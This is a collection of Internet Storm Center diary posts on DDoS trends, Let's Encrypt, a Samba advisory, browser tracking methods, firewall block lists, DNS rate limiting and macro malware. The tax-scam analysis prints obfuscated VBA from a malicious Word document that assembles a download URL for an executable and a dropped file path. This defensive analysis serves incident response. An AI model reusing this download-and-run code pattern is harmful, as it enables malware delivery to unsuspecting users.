DDOS are way down? Why?

I have been tracking DDoS volume and patterns for a few years. We have seen the attacks move from DNS to NTP, to chargen, then on to SSDP and occasionally QOTD. I think we have a much better understanding of the vulnerabilities that enable the successful amplification of DDoS attacks. Small steps have been made, and are continuing to be made, by vendors and ISPs to reduce the impact of this style of attack.

What I haven't been able to understand is why, since late last year, other than the occasional booter and attacks on Brian Krebs, the incidence and volume of these attacks have dropped off almost completely.

Any ideas?

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

Let's Encrypt!



As I have stated in the past, I am not a fan of all of the incomprehensible warning messages that average users are inundated with, and almost universally fail to understand, and the click-thru culture these dialogs are propagating.

Unfortunately this is not just confined to websites on the Internet. With the increased use of HTTPS for web based management, this issue is increasingly appearing on corporate networks. Even security appliances from established security companies have this issue.

The issue in most cases is caused by what is called a self-signed certificate: essentially, a certificate not backed by a recognized certificate authority. The fact is that recognized certificates are not cheap. For vendors to supply valid certificates for every device they sell would add significant cost to the product and would require the vendor to manage those certificates on all of their machines.

The Internet Security Research Group (ISRG), a public benefit corporation sponsored by the Electronic Frontier Foundation (EFF), Mozilla and other heavy hitters, aims to help reduce this problem and clean up the invalid certificate warning dialogs.

Their project, Let’s Encrypt, aims to provide certificates for free, and automate the deployment and expiry of certificates.

Essentially, a piece of software is installed on the server which will talk to the Let’s Encrypt certificate authority. From Let’s Encrypt’s website:

“The Let’s Encrypt management software will:

- Automatically prove to the Let’s Encrypt CA that you control the website

- Obtain a browser-trusted certificate and set it up on your web server

- Keep track of when your certificate is going to expire, and automatically renew it

- Help you revoke the certificate if that ever becomes necessary.”
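The expiry-tracking step in the list above can be illustrated with a minimal Python sketch. This is not the Let’s Encrypt client; the function names and the 30-day renewal threshold are assumptions chosen for illustration, and the timestamp format is the `notAfter` string that Python's `ssl` module reports for a certificate.

```python
import ssl
from datetime import datetime, timezone

SECONDS_PER_DAY = 86400

def days_until_expiry(not_after: str, now: datetime) -> float:
    """Days between `now` and a certificate's notAfter timestamp."""
    expires_at = ssl.cert_time_to_seconds(not_after)  # seconds since the epoch (UTC)
    return (expires_at - now.timestamp()) / SECONDS_PER_DAY

def needs_renewal(not_after: str, now: datetime, threshold_days: int = 30) -> bool:
    """True once fewer than `threshold_days` remain (the threshold is an assumption)."""
    return days_until_expiry(not_after, now) < threshold_days

# Hypothetical certificate that expires at the end of January 2016.
not_after = "Jan 31 00:00:00 2016 GMT"
print(needs_renewal(not_after, datetime(2015, 12, 1, tzinfo=timezone.utc)))
print(needs_renewal(not_after, datetime(2016, 1, 11, tzinfo=timezone.utc)))
```

A scheduled job could run a check like this daily and trigger a renewal only when it returns true.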

While there is still some complexity involved, it should make it a lot easier, and cheaper, for vendors to deploy legitimate certificates into their products. I am interested to see how they will stop bad guys from using their certificates for phishing sites, and what the process will be to report fraudulent use, but I am sure all of that will come.

Currently, it sounds like the Let’s Encrypt certificate authority will start issuing certificates in mid-2015.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


New Feature: Subnet Report

We have a new way to search our data more efficiently by subnet. Right now, the data covers recent reports to DShield and a few external feeds that we include. You can access the new report here: https://isc.sans.edu/subnetquery.html

I am still monitoring the impact the queries have on our overall database performance. For now, you are limited to 3 queries per minute if you are not logged in.

And as a reminder: The data is only as good as the data we receive. Please consider contributing your own data. See https://isc.sans.edu/howto.html for details. We also accept web server error logs (see: 404 project) and Kippo SSH honeypot logs.

In case of high database load, you will be redirected back to the index page (index_cached.html).


Samba vulnerability - Remote Code Execution - (CVE-2015-0240)

The Red Hat security team has released an advisory on a Samba vulnerability affecting Samba versions 3.5.0 through 4.2.0rc4. "It can be exploited by a malicious Samba client, by sending specially-crafted packets to the Samba server. No authentication is required to exploit this flaw. It can result in remotely controlled execution of arbitrary code as root." [1]

A patch [2] has been released by the Samba team to address the vulnerability.

[1] https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/

[2] https://www.samba.org/samba/history/security.html

Chris Mohan --- Internet Storm Center Handler on Duty


Copy.com Used to Distribute Crypto Ransomware

Thanks to Marco for sending us a sample of yet another piece of crypto-ransom malware. The file was retrieved after visiting a compromised site (www.my- sda24.com). Interestingly, the malware itself was stored on copy.com.

Copy.com is a cloud based file sharing service targeting corporate users. It is run by Barracuda, a company also known for its e-mail and web filtering products that protect users from just such malware. To its credit, Barracuda removed the malware within minutes of Marco finding it.

At least right now, detection for this sample is not great. According to Virustotal, 8 out of 57 virus engines identify the file as malicious [1]. A URL blocklist approach may identify the original site as malicious, but copy.com is unlikely to be blocked. It has become very popular for miscreants to store malicious files on cloud services, in particular if they offer free trial accounts. Not all of them are as fast as Barracuda in removing these files.

[1] https://www.virustotal.com/en/file/1473d1688a73b47d1a08dd591ffc5b5591860e3deb79a47aa35e987b2956adf4/analysis/


11 Ways To Track Your Moves When Using a Web Browser

There are a number of different use cases for tracking users as they use a particular web site. Some of them are more "sinister" than others. For most web applications, some form of session tracking is required to maintain the user's state. This is typically easily done using well configured cookies (and not the scope of this article). Sessions are meant to be ephemeral and will not persist for long.

On the other hand, some tracking methods do attempt to track the user over a long time, and in particular attempt to make it difficult to evade the tracking. This is sometimes done for advertisement purposes, but can also be done to stop certain attacks like brute forcing or to identify attackers that return to a site. In its worst case, from a privacy perspective, the tracking is done to follow a user across various web sites.

Over the years, browsers and plugins have provided a number of ways to restrict this tracking. Here are some of the more common techniques how tracking is done and how the user can prevent (some of) it:

1 - Cookies

Cookies are meant to maintain state between different requests. A browser will send a cookie with each request once it is set for a particular site. From a privacy point of view, the expiration time and the domain of the cookie are the most important settings. Most browsers will reject cookies set on behalf of a different site, unless the user permits these cookies to be set. A proper session cookie should not use an expiration date, as it should expire as soon as the browser is closed. Most browsers offer means to review, control and delete cookies. In the past, a "Cookie2" header was proposed for session cookies, but this header has been deprecated and browsers have stopped supporting it.

https://www.ietf.org/rfc/rfc2965.txt

http://tools.ietf.org/html/rfc6265
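To make the session versus persistent distinction concrete, here is a minimal sketch using Python's standard `http.cookies` module. The helper name and the two sample `Set-Cookie` values are hypothetical; the only rule it encodes is the one described above, that a session cookie carries no expiration.

```python
from http.cookies import SimpleCookie

def is_session_cookie(set_cookie_value: str) -> bool:
    """True if the cookie carries neither an Expires nor a Max-Age attribute."""
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    morsel = next(iter(jar.values()))  # first (only) cookie in the header value
    return not morsel["expires"] and not morsel["max-age"]

# Hypothetical Set-Cookie values for illustration.
session = "sid=abc123; Path=/; HttpOnly"
tracker = "uid=42; Max-Age=31536000; Domain=.example.com; Path=/"

print(is_session_cookie(session))
print(is_session_cookie(tracker))
```

The second cookie would survive a browser restart for a year and is scoped to a whole domain, which are the two settings the paragraph above singles out as privacy relevant.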

2 - Flash Cookies (Local Shared Objects)

Flash has its own persistence mechanism. These "flash cookies" are files that can be left on the client. They cannot be set on behalf of other sites ("Cross-Origin"), but one SWF script can expose the content of an LSO to other scripts, which can be used to implement cross-origin storage. The best way to prevent flash cookies from tracking you is to disable Flash. Managing flash cookies is tricky and typically requires special plugins.

https://helpx.adobe.com/flash-player/kb/disable-local-shared-objects-flash.html

3 - IP Address

The IP address is probably the most basic tracking mechanism of all IP based communication, but it is not always reliable, as users' IP addresses may change at any time and multiple users often share the same IP address. You can use various VPN products or systems like Tor to prevent your IP address from being used to track you, but this usually comes with a performance hit. Some modern JavaScript extensions (RTC in particular) can be used to retrieve a user's internal IP address, which can be used to resolve ambiguities introduced by NAT. But RTC is not yet implemented in all browsers. IPv6 may provide additional methods to use the IP address to identify users, as you are less likely to run into issues with NAT.

http://ipleak.net

4 - User Agent

The User-Agent string sent by a browser is hardly ever unique by default, but spyware sometimes modifies the User-Agent to add unique values to it. Many browsers allow adjusting the User-Agent and more recently, browsers started to reduce the information in the User-Agent or even made it somewhat dynamic to match the expected content. Non-Spyware plugins sometimes modify the User-Agent to indicate support for specific features.

5 - Browser Fingerprinting

A web browser is hardly ever one monolithic piece of software. Instead, web browsers interact with various plugins and extensions the user may have installed. Past work has shown that the combination of plugin versions and configuration options selected by the user tends to be amazingly unique, and this technique has been used to derive unique identifiers. There is not much you can do to prevent this, other than minimize the number of plugins you install (but that may be an indicator in itself).

https://panopticlick.eff.org
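As a rough illustration of how a combination of attributes becomes an identifier, the sketch below hashes a set of browser properties into a short ID. The attribute names and values are made up, and real fingerprinting scripts collect far more signals; this only shows the "combine and hash" idea.

```python
import hashlib

def fingerprint(attributes: dict) -> str:
    """Hash a set of browser attributes into a short, stable identifier."""
    # Sort the keys so the same attributes always produce the same string.
    canonical = "\n".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:16]

# Hypothetical attribute values a script might read from a browser.
visitor = {
    "user_agent": "ExampleBrowser/1.0",
    "plugins": "Flash 16.0.0.305; Java 7u75",
    "timezone_offset": "-300",
    "screen": "1920x1080x24",
}
print(fingerprint(visitor))
```

Changing any single value, such as one plugin version, yields a different identifier, which is why an unusual plugin mix makes a browser easy to single out.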

6 - Local Storage

HTML 5 offers two new ways to store data on the client: Local Storage and Session Storage. Local Storage is most useful for persistent storage on the client, and with that user tracking. Access to local storage is limited to the site that sent the data. Some browsers implement debug features that allow the user to review the data stored. Session Storage is limited to a particular window and is removed as soon as the window is closed.

https://html.spec.whatwg.org/multipage/webstorage.html

7 - Cached Content

Browsers cache content based on the expiration headers provided by the server. A web application can include unique content in a page, and then use JavaScript to check if the content is cached or not in order to identify a user. This technique can be implemented using images, fonts or pretty much any content. It is difficult to defend against unless you routinely (e.g. on closing the browser) delete all content. Some browsers allow you to not cache any content at all. But this can cause significant performance issues. Recently Google has been seen using fonts to track users, but the technique is not new. Cached JavaScript can easily be used to set unique tracking IDs.

http://robertheaton.com/2014/01/20/cookieless-user-tracking-for-douchebags/

http://fontfeed.com/archives/google-webfonts-the-spy-inside/

8 - Canvas Fingerprinting

This is a more recent technique and in essence a special form of browser fingerprinting. HTML 5 introduced a "Canvas" API that allows JavaScript to draw images in your browser. In addition, it is possible to read the image that was created. As it turns out, font configurations and other parameters are unique enough to result in slightly different images when using identical JavaScript code to draw the image. These differences can be used to derive a browser identifier. There is not much you can do to prevent this from happening. I am not aware of a browser that allows you to disable the canvas feature, and pretty much all reasonably up to date browsers support it in some form.

https://securehomes.esat.kuleuven.be/~gacar/persistent/index.html

9 - Carrier Injected Headers

Verizon recently added injecting specific headers into HTTP requests to identify users. As this is done "in flight", it only works for HTTP and not HTTPS. Each user is assigned a specific ID and the ID is injected into all HTTP requests as X-UIDH header. Verizon offers a for pay service that a web site can use to retrieve demographic information about the user. But just by itself, the header can be used to track users as it stays linked to the user for an extended time.

http://webpolicy.org/2014/10/24/how-verizons-advertising-header-works/

10 - Redirects

This is a bit of a variation on the "cached content" tracking. If a user is redirected using a "301" ("Moved Permanently") code, then the browser will remember the redirect and pull up the target page right away, not visiting the original page first. So for example, if you click on a link to "isc.sans.edu", I could redirect you to "isc.sans.edu/index.html?id=sometrackingid". Next time you go to "isc.sans.edu", your browser will automatically go directly to the second URL. This technique is less reliable than some of the other techniques, as browsers differ in how they cache redirects.

https://www.elie.net/blog/security/tracking-users-that-block-cookies-with-a-http-redirect
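The server side of this trick can be sketched in a few lines of Python. This is an illustrative model only, not code from any real site: the function name and return shape are assumptions, and it redirects to the same path with an `id` parameter rather than to a specific page.

```python
import uuid
from urllib.parse import parse_qs, urlsplit

def handle_request(url: str):
    """Return (status, redirect location or None, tracking ID) for one request."""
    parts = urlsplit(url)
    ids = parse_qs(parts.query).get("id")
    if ids:
        # The visitor arrived with an ID: either the first visit right after
        # the redirect, or a later visit replayed from the cached 301.
        return 200, None, ids[0]
    # No ID yet: mint one and answer with a cacheable permanent redirect.
    tracking_id = uuid.uuid4().hex
    return 301, f"{parts.path or '/'}?id={tracking_id}", tracking_id

status, location, tracking_id = handle_request("http://isc.sans.edu/index.html")
print(status, location)
```

Because the browser caches the 301, later requests for the plain URL go straight to the tagged URL, and the server sees the same ID again without setting any cookie.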

11 - Cookie Respawning / Syncing

Some of the methods above have pretty simple countermeasures. In order to make it harder for users to evade tracking, sites often combine different methods and "respawn" cookies. This technique is sometimes referred to as "Evercookie". If the user deletes, for example, the HTTP cookie but not the Flash Cookie, the Flash Cookie is used to re-create the HTTP cookie on the user's next visit.

https://www.cylab.cmu.edu/files/pdfs/tech_reports/CMUCyLab11001.pdf
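The respawning logic itself is simple, which is part of why it is so common. The sketch below models the client-side stores as a dictionary; the store names are hypothetical and a real implementation would run as JavaScript and Flash in the browser.

```python
def respawn(stores: dict) -> dict:
    """Copy a surviving tracking ID back into every store where it was deleted."""
    surviving = next((value for value in stores.values() if value is not None), None)
    if surviving is None:
        return dict(stores)  # nothing survived; the tracker has to issue a new ID
    return {name: surviving for name in stores}

# The user cleared HTTP cookies and local storage but not the Flash LSO.
after_cleanup = {"http_cookie": None, "flash_lso": "abc123", "local_storage": None}
print(respawn(after_cleanup))
```

Only clearing every store in the same session breaks the chain, which is what makes this combination harder to evade than any single method.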

Any methods I missed? (I am sure there have to be a couple...)


Subscribing to the DShield Top 20 on a Palo Alto Networks Firewall

This question has come up a few times in my recent travels, and it seemed like something worth posting for our readers. I hope you find it useful; comments welcome!

Overview

This will walk you through the steps of subscribing to our top 20 block list on a Palo Alto Networks firewall. It will also show you how to make a rule using the external block list. You can create rules to block both inbound and outbound traffic; however, this walk-through includes only an outbound rule. Any traffic transiting outbound from an internal host to an address on the top 20 list should be considered suspect, prevented, and then investigated.

Our DShield Top 20 List can always be found here:

http://feeds.dshield.org/block.txt

The source for the parsed and Palo Alto Networks formatted version of the DShield block list can be found here:

http://panwdbl.appspot.com/lists/dshieldbl.txt
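If you want to do a similar conversion yourself, the following is a minimal sketch of turning block-list text into one CIDR entry per line. It assumes the feed is tab-separated with the start address in the first column and the prefix length in the third, and that comment lines begin with `#`; check the live file before relying on that layout. The sample rows use documentation address ranges, not real list entries.

```python
import ipaddress

def parse_block_list(text: str) -> list:
    """Turn block-list text into a list of CIDR strings."""
    networks = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue  # skip blank lines and comments
        fields = line.split("\t")
        if len(fields) < 3:
            continue
        try:
            network = ipaddress.ip_network(f"{fields[0]}/{fields[2]}", strict=False)
        except ValueError:
            continue  # column header or malformed row
        networks.append(str(network))
    return networks

sample = (
    "# hypothetical sample, documentation address ranges only\n"
    "Start\tEnd\tNetmask\tAttacks\n"
    "192.0.2.0\t192.0.2.255\t24\t1234\n"
    "198.51.100.0\t198.51.100.255\t24\t567\n"
)
print("\n".join(parse_block_list(sample)))
```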

The full source of external block lists:

It is my understanding that this ‘unofficial’ source is maintained by a Palo Alto Networks systems engineer, although this is not confirmed.



Creating the External Block List Subscription

1. Go to Objects -> Dynamic Block Lists

2. Click Add

A. Name the External Block List Subscription (e.g. DShield Recommended Block List.)

B. Copy the preformatted subscription from our unofficial formatting app http://panwdbl.appspot.com/lists/dshieldbl.txt and paste into source block.

C. Click Test Source URL

You have just subscribed to an External Block List (EBL). Once an hour this subscription will poll the external block source and automatically update itself. This does not actually apply the feed to any rules or policies; in the next section we will create an outbound blocking rule looking for Indicators of Compromise.

Creating the Outbound Rule

Overview

There are several ways to use an EBL. One of the most common is to block or restrict inbound flows, and although this should be done, we will use a different method for this example. In this section we will block and alert on outbound traffic from our L3-Trust zone to L3-Untrust (basically from our trusted internal zone to our untrusted external zone; your naming convention may differ). This will serve as a possible indicator of compromise (IoC).

On the topic of IoC, let’s be clear that this can only serve as a possible indicator of compromise. Mileage may vary depending on your EBL. The DShield EBL (the EBL selected for this lab) is hosted by the Internet Storm Center and has been maintained for over a decade. Any communication to those hosts should be considered suspect, but it is not a clear case for declaring a compromise. Regardless, it should be best current practice (BCP) to at least alert on this traffic outbound. Inbound traffic from these hosts and netblocks is largely considered noise. Please direct any questions regarding the DShield Recommended Block List to handlers@isc.sans.edu. For the history behind the DShield top 20, check out https://isc.sans.edu/about.html.

WARNING!!!!!!!!!

Step 2.D is critical! If you miss step 2.D, the new rule will shadow all your other rules and stop all outbound traffic in your environment. Please pay CLOSE attention to step 2.D. YOU HAVE BEEN WARNED! Do not miss this step. Also, for troubleshooting: if all your traffic stops after this walk-through, you can disable the rule and troubleshoot your External Block List.





1. Go to Policies -> Security

2. Click Add

A. Give the Rule a Name (e.g. EBL DShield Rule)



B. Under the source tab select L3-Trust or your trusted internal zone name (remember this is an IoC rule, not just a normal block noise rule).



C. Under the destination tab select L3-Untrust or your untrusted external zone.



D. Under the destination tab in the destination address select the DShield EBL subscription. (DO NOT MISS THIS STEP!)



E. Under the actions tab change allow to deny. Optionally you can set logging to an external syslog here as well.

F. Click okay.

G. Highlight the new rule, click move, which can be found at the bottom of the GUI, and select top. We are moving this rule to the top as we want to catch all attempts to reach the EBL outbound before any other rule is triggered.

H. Commit
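Why skipping step 2.D is so destructive becomes obvious with a simplified model of top-down, first-match rule evaluation. The sketch below is not PAN-OS code: zones are omitted, the rule dictionaries and the `allow-outbound` rule are hypothetical, and a documentation range stands in for the DShield list.

```python
import ipaddress

def first_match(rules, dst_ip):
    """Return (rule name, action) of the first rule whose destination matches."""
    address = ipaddress.ip_address(dst_ip)
    for rule in rules:
        destinations = rule["destinations"]
        if destinations == "any" or any(
            address in ipaddress.ip_network(net) for net in destinations
        ):
            return rule["name"], rule["action"]
    return "implicit-default", "deny"

EBL = ["192.0.2.0/24"]  # hypothetical stand-in for the DShield list

correct = [
    {"name": "EBL DShield Rule", "destinations": EBL, "action": "deny"},
    {"name": "allow-outbound", "destinations": "any", "action": "allow"},
]
# Same rule with step 2.D skipped: the destination address is left at "any".
broken = [
    {"name": "EBL DShield Rule", "destinations": "any", "action": "deny"},
    {"name": "allow-outbound", "destinations": "any", "action": "allow"},
]

print(first_match(correct, "203.0.113.10"))
print(first_match(broken, "203.0.113.10"))
```

With the destination address set, only traffic to listed networks hits the deny rule. Without it, the deny rule at the top matches everything and no later rule is ever reached.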

NOTE: If you receive a warning as indicated in the screenshot, check your internet connection, as it indicates that the EBL was not reachable. Also, some EBLs have maximum polling counts and only allow a refresh every so often (e.g. 1 hour). This could have been triggered when you tested the URL connection. These are two reasons why your EBL may not be reachable.

It is also possible to check the EBL on the CLI:

> request system external-list refresh name

Screencast of the Above


Leave Things Better Than When You Found Them

Whether at the end of a project or at the end of your time with an organization, there are some low impact and high reward actions you can take to ensure that you leave things better than when you found them. Although it is not without risk for us as security professionals, if you have the opportunity it is ideal to spend time training your successor before you leave. Through a few intentional actions you can leave a legacy that can serve to inspire others to not only sustain but to actually improve operations.

This topic is particularly close to me now because I have recently started a new position. I had the opportunity to share my experience with others and found it to be rewarding and also a little uncomfortable for me and for the person who was assuming my duties. I found myself personally and professionally invested in the success of the program while recognizing that it was time for me to let go. There are of course certain circumstances that will prevent this sharing from happening. Sometimes policies will dictate that when someone resigns, that team member is escorted from the premises right away.

Even if you are not making your next career move, maybe you are transitioning from a project and can use this time to help others. The following are some suggestions on what you can provide to your successor:

- Operational guides

- Original installation media

- Configuration checklists

- Installation guides along with clear documentation of any deviations from the vendor instructions

- Lessons learned of things that must be done along with those that must *never* be done

- Key contacts to support sustaining the project such as administrators, change control tickets and project documentation

Even if you are not on the way out, I recommend that you "begin with the end in mind" today. Start by setting a monthly reminder on your work calendar to update and maintain your project or program documentation. You may very well recognize that the person this helps the most is you!

Use the comments section to share what you are doing to leave things better than when you found them.

Russell Eubanks

@russelleubanks

Securityeverafter


Fast analysis of a Tax Scam

It’s tax time and I’m starting to see a lot of phish/spam on this subject. Below is a popular one from the last couple of days.

=================

TAХ RЕTURN FOR ТНE YEАR 2014

RЕCАLCULАTION ОF YOUR ТАХ RЕFUND

HМRС 2013-2014

LOСАL OFFIСE No. 2669

ТАX СREDIТ ОFFICЕR: Jimmie Bеnton

TАХ REFUND ID NUМВER: 2440409

REFUND AМOUNТ: 2709.81 USD

Dеar USER,

The соntents оf this emаil and аnу attachmеnts arе соnfidentiаl and аs

арpliсablе, сорyright in thеse is resеrvеd tо IRS Rеvеnuе Customs.

Unless eхprеsslу аuthorised bу us, any further dissеmination or

distributiоn of this еmail оr its аttaсhmеnts is рrоhibited.

If you are nоt the intеnded rеcipiеnt оf this emаil, plеаsе reрly to

infоrm us thаt уоu have rесеived this еmаil in error and thеn

deletе it without retaining аnу сoрy.

I am sеnding this emаil to annоunсe: After the lаst аnnuаl саlсulаtiоn оf

yоur fiscаl аctivitу we hаvе determined that yоu аrе еligiblе to

rесеive a tаx refund оf 2709.81 USD

Yоu havе attaсhed the taх return form with the TАX RЕFUND NUMВЕR

ID: 2440409, сomplеte the tах rеturn fоrm аttаched to this mеssagе.

Aftеr соmрleting the form, pleаsе submit thе fоrm by clicking thе

SUВMIТ buttоn оn fоrm.

Sinсеrely,

Jimmiе Вenton

IRS Tax Credit Оffice

ТAХ RЕFUND ID: US2440409-IRS

© Сорyright 2015, IRS Rеvenue &аmр; Сustоms US

Аll rights rеserved.

======================

With so many of these types of mails, analysis needs to be quick to determine who may have been affected. Here is the process.

1. Rename the .doc file to .zip

$mv tax_refund_2440409.doc MALWARE-tax_refund_2440409.zip

2. Unzip file

$unzip MALWARE-tax_refund_2440409.zip

inflating: [Content_Types].xml

inflating: _rels/.rels

inflating: word/_rels/document.xml.rels

inflating: word/document.xml

inflating: word/header3.xml

inflating: word/footer2.xml

inflating: word/footer1.xml

inflating: word/header2.xml

inflating: word/header1.xml

inflating: word/endnotes.xml

inflating: word/footnotes.xml

inflating: word/footer3.xml

inflating: word/theme/theme1.xml

inflating: word/_rels/vbaProject.bin.rels

inflating: word/vbaProject.bin

inflating: word/settings.xml

inflating: word/vbaData.xml

inflating: word/webSettings.xml

inflating: word/styles.xml

inflating: docProps/app.xml

inflating: docProps/core.xml

inflating: word/fontTable.xml

3. vbaProject.bin holds the macro code we want to look at, so run strings on it.

$strings word/vbaProject.bin

…

Select * from Win32_OperatingSystem

@echo off

ping 2.2.1.1 -n

…

$someFilePath = 'c:\Users\

\AppData\Local\Temp\

444.e

strRT =

://www.zaphira.de/wp-admin/includes/file

...

Within about 2 minutes I was able to determine some basic IOCs and see if anyone actually accessed the site or tried to ping the address.
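If you need to repeat this triage on many samples, the same idea can be scripted. The sketch below is a rough Python equivalent of running `strings` and picking out network-looking results; the function names and the byte sample are illustrative, and the filter is deliberately crude.

```python
import re

def ascii_strings(data: bytes, min_len: int = 4) -> list:
    """Rough equivalent of `strings`: runs of printable ASCII of at least min_len bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [match.decode("ascii") for match in re.findall(pattern, data)]

def network_indicators(strings: list) -> list:
    """Keep strings that look like URL fragments or dotted-quad IPv4 addresses."""
    ipv4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
    return [s for s in strings if "://" in s or ipv4.search(s)]

# Stand-in for the bytes of word/vbaProject.bin, built from the strings shown above.
blob = (
    b"\x00\x01@echo off\x00\x02ping 2.2.1.1 -n\x00\xff"
    b"://www.zaphira.de/wp-admin/includes/file\x00ab\x00"
)
for indicator in network_indicators(ascii_strings(blob)):
    print(indicator)
```

On a real sample you would read the file with `open(path, "rb").read()` and feed the resulting indicators into your proxy and DNS log searches.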

Deeper

If you want to dig deeper and spend a bit more time, you can install and configure oledump which was discussed on (hxxps://isc.sans.edu/diary/oledump+analysis+of+Rocket+Kitten+-+Guest+Diary+by+Didier+Stevens/19137).

To list all the parts of the file, just run the script with no switches.

$python oledump_V0_0_8/oledump.py MALWARE-tax_refund_2440409.doc

A: word/vbaProject.bin

A1: 556 'PROJECT'

A2: 71 'PROJECTwm'

A3: 97 'UserForm1/\x01CompObj'

A4: 266 'UserForm1/\x03VBFrame'

A5: 58 'UserForm1/f'

A6: 0 'UserForm1/o'

A7: M 25751 'VBA/ThisDocument'

A8: m 1159 'VBA/UserForm1'

A9: 4506 'VBA/_VBA_PROJECT'

A10: 811 'VBA/dir'

To get the whole script use the following.

$python oledump.py -s A7 -v MALWARE-tax_refund_2440409.doc

The output is sent to the screen to look at.

…

Print #FileNumber, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.zaphira.de/wp-admin/includes/file" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

…

Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"

In this case, oledump gave us a lot more info, but it proves we were on the right track with a simple strings run on the file. Additionally, we can see an infected user may have a file called 444.exe. There are lots more local IOCs we could create, but with the few network IOCs we can get a fast idea of possibly affected users.
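The `Chr(Asc(...))` padding in the macro is trivial to undo by hand, but a small evaluator saves time when there are many such lines. The following is a minimal sketch, not a VBA parser: it handles only string literals, numbers, `Chr` and `Asc`, splits naively on `+` and `&`, and renders any unknown identifier (such as `USER`) as a placeholder.

```python
import re

def evaluate(term: str):
    """Evaluate one term: a string literal, a number, or nested Chr()/Asc() calls."""
    term = term.strip()
    if len(term) >= 2 and term[0] == '"' and term[-1] == '"':
        return term[1:-1]          # string literal
    if term.isdigit():
        return int(term)           # numeric argument, e.g. the 34 in Chr(34)
    call = re.fullmatch(r"(Chr|Asc)\((.*)\)", term)
    if call:
        argument = evaluate(call.group(2))
        return chr(argument) if call.group(1) == "Chr" else ord(argument[0])
    return f"<{term}>"             # unknown identifier, kept as a placeholder

def deobfuscate(expression: str) -> str:
    """Join the evaluated terms of a VBA string concatenation."""
    # Naive split: assumes no "+" or "&" occurs inside a string literal.
    terms = re.split(r"\s*[+&]\s*", expression)
    return "".join(str(evaluate(term)) for term in terms)

line = (
    r'"strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + '
    r'"://www.zaphira.de/wp-admin/includes/file" + "." + Chr(Asc("e")) + '
    r'Chr(Asc("x")) + "e" + Chr(34)'
)
print(deobfuscate(line))
```

Run against the first `Print` statement above, this reassembles the download URL that the plain strings output only showed in pieces.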

--

Tom Webb


DNS-based DDoS

ISC reader Zach reports that his company currently sees about 4Gbps of DNS requests beyond what is "normal", and all seem to originate from 91.216.194.0/24. Yup, someone on that IP range in Poland is likely having a "slow network day".

To make it less likely that your DNS servers unwittingly participate in a denial of service attack against someone else, consider using rate-limiting. If you are not running a massively popular eCommerce site, odds are your bandwidth and the load limit of your DNS server are way way beyond what you actually need.

The easiest way to rate-limit (if you use Linux) is to put an iptables rule on port 53 that controls how many packets per source IP address will be accepted per minute. BIND, one of the most popular DNS servers, introduced a response rate-limiting option in version 9.10 that lets you define how many responses per second the server will provide before it punts. Both are good ideas if you run an authoritative DNS server that has way more bandwidth and muscle than your actual usage requires.
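Both options boil down to per-source rate limiting. The sketch below shows the idea as a token bucket in Python; it is a conceptual model only, not an iptables rule or a BIND configuration, and the class name and the rate and burst values are assumptions for illustration.

```python
from collections import defaultdict

class PerSourceRateLimiter:
    """Token bucket per source IP: `rate` packets per second, bursts up to `burst`."""

    def __init__(self, rate: float, burst: int):
        self.rate = rate
        self.burst = burst
        self.tokens = defaultdict(lambda: float(burst))  # new sources start full
        self.last_seen = {}

    def allow(self, src_ip: str, now: float) -> bool:
        # Refill tokens for the time elapsed since this source was last seen.
        elapsed = now - self.last_seen.get(src_ip, now)
        self.last_seen[src_ip] = now
        self.tokens[src_ip] = min(self.burst, self.tokens[src_ip] + elapsed * self.rate)
        if self.tokens[src_ip] >= 1:
            self.tokens[src_ip] -= 1
            return True
        return False  # over the limit: drop or ignore the query

limiter = PerSourceRateLimiter(rate=1, burst=3)
print([limiter.allow("192.0.2.10", now=0.0) for _ in range(5)])
```

A source that stays under the rate never notices the limiter, while a spoofed flood of queries from one address is cut off after the initial burst.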




Macros? Really?!

Yes indeed! While the past 15 years or so were mostly devoid of any significant macro viruses, macro-based malware is now making a "successful" comeback. Last week, we saw a significant Dridex malware run that was using macros in Excel files (.XLSM), and earlier this week, the crooks behind the banking spyware "Vawtraq" started to spam the usual "Fedex Package" and "Tax Refund" emails, but unlike in other malspam runs, the attachment was no longer a ZIP with an EXE or SCR inside, but rather a file in Microsoft Office .DOC format. File extension based blocking on the email gateway is not going to save your bacon on this one!

For Vawtraq, if the recipient opens the DOC, the content looks garbled, and the only readable portion is in (apparently) user-convincing red font, asking the recipient to enable macros. You can guess what happens next if the user falls for it: a VBS and a PowerShell file get extracted from the DOC, and then download and run the Vawtraq malware executable. The whole mess has very low detection in anti-virus. Yesterday's Vawtraq started with zero hits on VirusTotal, and even today, one day later, it hasn't made it past 7/52 anti-virus engines detecting the threat. Thus, odds are you will need to revert to manual analysis to determine if a suspicious Office document is indeed malicious, and to extract any indicators from it that can help to discover users on your network who have been "had".

Besides Didier Stevens' "oledump" that we covered last month, my favorite toolkit for this analysis is the python-oletools package by Philippe Lagadec. "olevba" in particular does a great job at parsing out all the obfuscated code, and is often even able to extract actionable indicators of compromise (IOC), like URLs and IP addresses. The example below is an abbreviated "olevba" analysis of a recent Dridex run, and it nicely shows how the next stage URL and EXE name are pulled out in one quick swoop. Give it a try!


A Different Kind of Equation

Both the mainstream media and our security media are abuzz with Kaspersky's disclosure of their research on the "Equation" group and the associated malware. You can find the original blog post here: http://www.kaspersky.com/about/news/virus/2015/equation-group-the-crown-creator-of-cyber-espionage

But if you want some real detail, check out the Q&A document that goes with this post: http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf

Way more detail, and much more sobering to see that this group of malware goes all the way back to 2001, and includes code to map disconnected networks (using USB key C&C like Stuxnet did), as well as the disk firmware facet that's everyone's headline today.

